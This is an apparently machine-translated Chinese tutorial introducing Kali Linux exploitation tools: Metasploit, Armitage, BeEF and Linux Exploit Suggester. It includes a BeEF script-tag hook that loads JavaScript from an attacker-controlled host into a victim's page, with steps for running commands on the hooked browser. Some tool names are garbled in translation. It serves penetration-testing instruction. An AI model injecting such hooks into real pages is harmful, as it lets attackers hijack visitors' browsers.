Kali Linux - 开发工具介绍及应用

在本章中,我们将学习Kali Linux提供的各种开发工具。

Metasploit的

正如我们之前提到的,Metasploit是Rapid7的产品,大部分资源可以在他们的网页https://www.metasploit.com上找到。 它有两个版本 - 商业版和免费版。 这两个版本之间的差异并不大,因此在这种情况下,我们将使用社区版本(免费)。

作为道德黑客,您将使用嵌入了Metasploit社区版本的“Kali Ditribution”,以及通过节省安装时间而非常舒适的其他道德黑客工具。 但是,如果要将其作为单独的工具安装,则可以将其安装在Linux,Windows和OS X等操作系统中。

首先,在Kali打开Metasploit控制台。 然后,转到应用程序→利用工具→Metasploit。

开发工具

启动后,您将看到以下屏幕,其中Metasploit版本以红色下划线。

Metasploit版本

在控制台中,如果您使用帮助或? 符号,它会向您显示MSP命令及其描述的列表。 您可以根据您的需求选择,以及您将使用什么。

控制台符号

另一个重要的管理命令是msfupdate ,它有助于使用最新的漏洞攻击来更新metasploit。 在控制台中运行此命令后,您将不得不等待几分钟,直到更新完成。

MSFUpdate

它有一个很好的命令叫“搜索”,你可以用它来找到你想要的,如下面的截图所示。 例如,我想查找与Microsoft有关的漏洞,命令可以是msf> search name:Microsoft type:exploit 。

其中“搜索”是命令,“名称”是我们正在寻找的对象的名称,“类型”是我们正在寻找什么样的脚本。

搜索命令

另一个命令是“信息”。 它提供有关使用模块或平台的信息,作者是谁,漏洞引用以及负载限制。

信息命令

阿米蒂奇

metasploit的Armitage GUI是metasploit的补充工具。 它可以对目标进行可视化,建议利用,并揭露高级后期开发功能。

打开它,但首先metasploit控制台应该打开并启动。要打开Armitage,请转至应用程序→利用工具→Armitage。

阿米蒂奇

点击连接按钮,如下图所示。

连

打开时,您将看到以下屏幕。

用户友好

阿米蒂奇是用户友好的。 “目标”区域列出了您发现和正在使用的所有机器,被黑客入侵的目标是红色的,有雷暴。

在黑客入侵目标后,您可以右键单击目标,并继续浏览您需要执行的操作,例如浏览(浏览)这些文件夹。

探索

在下面的GUI中,您将看到文件夹(称为控制台)的视图。 只需单击文件夹,即可在不需要metasploit命令的情况下浏览文件夹。

在GUI的右侧,是列出了漏洞模块的部分。

控制台文件夹

牛肉

BeEF代表浏览器开发框架 。 这是一个专注于Web浏览器的渗透测试工具。 BeEF允许专业渗透测试人员使用客户端攻击矢量来评估目标环境的实际安全状态。

首先,您必须使用以下命令更新Kali软件包 -

root@kali:/# apt-get update  
root@kali:/# apt-get install beef-xss 

To start, use the following command −

root@kali:/# cd /usr/share/beef-xss  
root@kali:/# ./beef 
卡利包打开浏览器,输入用户名和密码:beef 

.

打开浏览器

BEEF是一个托管在BEEF服务器上的JavaScript文件,需要在客户端浏览器上运行。当它运行时,它会返回到牛肉服务器,传达关于目标的大量信息。它还允许针对目标运行额外的命令和模块。在这个例子中,牛肉钩子的位置在 http://192.168.1.101:3000/hook.js .

为了攻击浏览器,将JavaScript钩子包含在客户端将要查看的页面中。有很多方法可以做到这一点,但最简单的方法是将下列内容插入页面,并让客户机打开它。

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script> 

一旦页面加载,返回到牛肉控制面板,点击左上方的“在线浏览器”。几秒钟后,你应该看到你的IP地址弹出显示一个钩状浏览器。在IP上悬停会很快提供信息,比如浏览器版本、操作系统以及安装了什么插件。

页面加载

要远程运行命令,请单击“Owned”主机。然后,在命令中单击要执行的模块,最后单击“Execute”。

远程运行

Linux开发提议者
这表明可能利用给定的发布版本‘uname -r’ 的Linux操作系统。

运行,键入以下命令−

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0是我们要利用的Linux操作系统的内核版本。

内核版本
 



发表评论 / Comment

用心评论~